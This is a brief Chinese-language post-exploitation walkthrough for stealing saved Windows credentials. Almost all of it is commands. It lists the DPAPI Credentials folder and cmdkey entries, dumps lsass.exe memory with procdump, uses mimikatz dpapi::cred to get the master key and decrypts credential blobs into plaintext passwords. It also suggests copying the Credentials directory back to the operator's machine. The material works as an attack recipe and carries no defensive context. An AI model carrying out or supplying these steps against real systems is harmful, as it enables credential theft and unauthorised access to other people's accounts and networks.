一、查看是否存在憑證
1.dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
2.cmdkey /list
實際情況下最好將Credentials目錄打包回本地,這里測試只下載了單個文件
上傳procdump64.exe -accepteula -ma lsass.exe lsass.dmp 執行獲取內存文件
mimikatz # dpapi::cred /in:C:\user\DACFAEA5B624B4361794A2CC8AED1460,記錄guidMasterKey
本地使用命令加載dmp並獲取對應得MasterKey:
找到之前所對應得guid得到masterkey,使用Masterkey解密憑證得到明文密碼
dpapi::cred /in:C:\Users\Desktop\d1e69106e /masterkey:6e65bc98836fcd5cd41c2d28ec96e538804c8b4d0419569b54a1be526f998192b1791ee40d995e6b4a9b3f126
